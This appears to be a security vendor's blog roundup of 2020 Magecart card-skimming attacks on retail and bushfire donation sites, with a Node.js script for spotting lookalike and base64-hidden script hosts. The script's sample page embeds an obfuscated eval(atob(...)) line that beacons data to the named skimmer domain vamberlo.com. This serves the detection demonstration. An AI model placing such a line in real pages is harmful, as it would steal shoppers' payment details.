New Year Magecart Attacks include Australian Bushfire Donation Sites

Here’s the latest news on Magecart and other website attacks! We’ve trawled the web for the latest news of data breaches, including updates on previous attacks with insights from our own Security Research Team.

Latest Attacks:

  • Active Network
  • Focus Camera
  • Perricone MD
  • Australian Bushfire Donation Sites
  • Hanna Andersson

Active Network

The first reported Magecart attack of 2020 was an attack on school management software provider Active Network. ZDNet revealed hackers had gained access to Blue Bear, a school management platform that handles school accounting and online stores. Parents who paid school fees or bought via the online stores had their credit card details stolen. The attack was active for around six weeks, between October 1st, 2019 and November 13th, 2019.

In a Notice of Data Breach sent to parents, Active Network explains: “We recently identified suspicious activity on the Blue Bear platform.” It goes on to say: “We take this matter very seriously. As soon as we identified the suspicious activity, our counsel engaged a leading cybersecurity firm to investigate the incident and took steps to enhance its monitoring tools and security controls.”

Active Network are offering free identity monitoring to affected customers. However, a Tulsa-based law firm is currently investigating the breach and hopes to file a class-action lawsuit against Active Network.

Focus Camera

On January 7th, Bleeping Computer reported an attack on photography retailer Focus Camera. The exact dates of the attack are unknown; however, customers who shopped on the site from late December until early January may have had their personal and financial details stolen.

The malicious domain (zdsassets.com) was registered on November 11th, 2019 in the Netherlands. The single extra letter is easy to miss next to the legitimate Zendesk asset domain (zdassets.com), which is exactly what makes the lookalike effective in a page's list of third-party scripts.

The attack was discovered by security researcher Mounir Hahad. Hahad found that the attacker had modified a JavaScript file to inject an obfuscated, base64-encoded payload. DNS telemetry seen by Hahad showed that the command-and-control domain receiving Focus Camera customers' data had been resolved 905 times since its creation. This could indicate the number of affected users; however, as Hahad explains, the same domain may have been used across multiple sites, so the figure is only a rough indicator. As of January 6th, the malicious code is no longer active on the site.

Perricone MD

In a recent blog post, a RapidSpike Security Researcher explains how we discovered multiple attacks on science-based skincare brand Perricone MD. The attacks affected perriconemd.co.uk, perriconemd.it and perriconemd.de. The two hacking groups involved were able to insert malicious code directly into the websites; it is suspected that this was possible due to a vulnerability in the Magento platform running the websites:

The two attacks present on Perricone MD’s site

The first hack can be traced back to November 2018. Debugging the code revealed that the script was attempting to load a skimmer; however, a mistake in the code caused an error that stopped the skimmer from loading successfully.

The second hacking group gained access to the websites a year later, in November 2019, likely through the same vulnerability. They registered an imitation domain, perriconemd.me.uk, to go undetected, and loaded the skimmer only on the checkout page. The server hosting perriconemd.me.uk (124.156.210.169) is located in Japan and hosts several other domains linked to a wide range of data breaches and credit card theft (full list available here).

Despite numerous attempts to contact the company, no one acknowledged the attack on the site. The code was finally removed on January 11th.
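Both the Focus Camera and the Perricone MD compromises hid behind a lookalike hostname (zdsassets.com next to zdassets.com, perriconemd.me.uk next to perriconemd.co.uk), and Focus Camera's payload was additionally tucked into a base64 blob. The script below is an added example, not RapidSpike's product code and not code from any of the skimmers above: it audits the script hosts on a checkout page against a trusted set, flags hosts within a small edit distance of a trusted one as lookalikes, and decodes long base64 runs in inline scripts to surface any hostname hidden there. The page URL, allowlist, script paths and the sample HTML are constructed for the demonstration; only the hostnames come from the incidents described. It runs under Node.js.

```javascript
// Added example (not RapidSpike's code, nor any skimmer's code): audit the
// script hosts on a checkout page, flagging untrusted hosts, lookalikes of
// trusted hosts, and hostnames hidden inside base64 blobs in inline scripts.

// Levenshtein edit distance between two strings (single-row DP).
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

// Treat "www.example.com" and "example.com" as the same party.
const normHost = (h) => h.toLowerCase().replace(/^www\./, "");

// Classify one host against the trusted set; returns [] when trusted.
function classifyHost(host, trusted, source) {
  const h = normHost(host);
  if (trusted.has(h)) return [];
  let nearest = null, best = Infinity;
  for (const t of trusted) {
    const d = editDistance(h, t);
    if (d < best) { best = d; nearest = t; }
  }
  // One or two edits away from a trusted host is the typosquat pattern seen above.
  const verdict = best <= 2 ? `lookalike of ${nearest}` : "unknown host";
  return [{ host: h, source, verdict }];
}

// Decode long base64 runs anywhere in the page and pull out any URL hosts they hide.
function findHiddenHosts(html) {
  const hosts = [];
  for (const m of html.matchAll(/[A-Za-z0-9+/]{40,}={0,2}/g)) {
    const decoded = Buffer.from(m[0], "base64").toString("utf8");
    if (!/^[\x20-\x7e\s]*$/.test(decoded)) continue; // not printable text, skip
    for (const u of decoded.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.push(u[1]);
  }
  return hosts;
}

// Walk every <script src> (resolving relative URLs against the page), then the
// base64-hidden hosts, and return the findings in document order.
function auditScripts(html, pageUrl, allowedHosts) {
  const trusted = new Set([normHost(new URL(pageUrl).hostname), ...allowedHosts.map(normHost)]);
  const findings = [];
  for (const m of html.matchAll(/<script[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi)) {
    const host = new URL(m[1], pageUrl).hostname;
    findings.push(...classifyHost(host, trusted, "script src"));
  }
  for (const host of findHiddenHosts(html)) {
    findings.push(...classifyHost(host, trusted, "base64 payload"));
  }
  return findings;
}

// Constructed sample page (assumed paths and allowlist; hostnames from the incidents above).
const PAGE_URL = "https://www.perriconemd.co.uk/checkout/";
const ALLOWED_HOSTS = ["static.zdassets.com", "zdassets.com"];
// Hidden payload built at run time so the blob is valid base64 of a known string.
const HIDDEN = Buffer.from('new Image().src="https://vamberlo.com/g?"+d', "utf8").toString("base64");
const SAMPLE_CHECKOUT_HTML = `
<script src="https://static.zdassets.com/ekr/snippet.js"></script>
<script src="/js/checkout.js"></script>
<script src="https://zdsassets.com/ekr/snippet.js"></script>
<script src="https://perriconemd.me.uk/js/lib.js"></script>
<script>eval(atob("${HIDDEN}"))</script>
`;

for (const f of auditScripts(SAMPLE_CHECKOUT_HTML, PAGE_URL, ALLOWED_HOSTS)) {
  console.log(`${f.source}: ${f.host} -> ${f.verdict}`);
}
```

Run against the sample, the audit reports zdsassets.com as a lookalike of zdassets.com, perriconemd.me.uk as a lookalike of perriconemd.co.uk, and vamberlo.com, recovered from the base64 blob, as an unknown host; the first-party checkout.js and the genuine Zendesk script are passed as trusted. The edit-distance threshold of 2 is a deliberate trade-off: it catches the single-letter and two-letter swaps used in these attacks but will also flag some unrelated short domains, so treat "lookalike" as a prompt for a human check rather than a verdict.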

Australian Bushfire Donation Sites

In an attack that shows how quickly these attackers move, it was revealed on January 10th that sites raising donations for the Australian bushfires had been compromised. Bleeping Computer explains: “When a visitor of the site adds an item to their cart, such as a donation, a malicious credit-card skimmer script named ATMZOW will be loaded into the checkout pages. When a user submits their payment information as part of the checkout process, the malicious script will steal the submitted information and send it to the vamberlo[.]com domain. This domain is obfuscated in the script.”

Donation page with the ATMZOW skimmer (Credit: Bleeping Computer)

Jérôme Segura discovered the attack and was able to get vamberlo[.]com shut down, stopping the skimmer from exfiltrating data. That said, as the site itself is still compromised, it remains open to reinfection. Security researcher Troy Mursch used the PublicWWW tool and found the same script currently active on 39 other websites.

It is currently unknown how many donors were affected or how long the script was active on the site; however, since the bushfires started in late December, the script could have been active for weeks.

Hanna Andersson

On January 20th, Bleeping Computer revealed that the popular US children’s apparel retailer Hanna Andersson had disclosed an attack on its website. The website was hacked and malicious code was injected to steal payment details from the checkout pages. Hanna Andersson confirmed that the compromise could have begun as early as September 15th, 2019.

In an email to customers on January 15th, Hanna Andersson stated: “On December 5th, 2019, law enforcement informed Hanna Andersson that credit cards used on its website were available for purchase on a dark web site.” They go on to explain how the attack took place: “Third-party ecommerce platform, Salesforce Commerce Cloud, was infected with malware that may have scraped information entered by customers into the platform during the purchase process.” Hanna Andersson could not confirm which customers paid through Salesforce Commerce Cloud and therefore contacted all customers who purchased through the site during the infection period.

In a Notice of Security Incident sent to customers, Hanna Andersson explained that they have “taken steps to re-secure the online purchasing platform.” In addition, Hanna Andersson are offering identity protection services and a $1,000,000 insurance reimbursement policy to customers. The malware was removed on November 11th, 2019.

Attacks through a shared third-party platform like this are not uncommon: the recent attack on Sweaty Betty also came via the same third party (previously known as Demandware). According to BuiltWith, Salesforce Commerce Cloud is currently used by over 2,800 live websites, so a single compromise of the platform has a wide blast radius.

RapidSpike security researchers have taken the time to investigate all of the Magecart attacks mentioned above. We can confidently say our Magecart Detection would have detected every one of them. Magecart Detection takes less than 5 minutes to set up and will alert you to any untrusted data on your ecommerce site.

Worried about being attacked? Detect website skimming, formjacking and supply chain attacks. Easily protect against unauthorised changes to your critical JavaScript files with RapidSpike Magecart Detection.

Other Security News: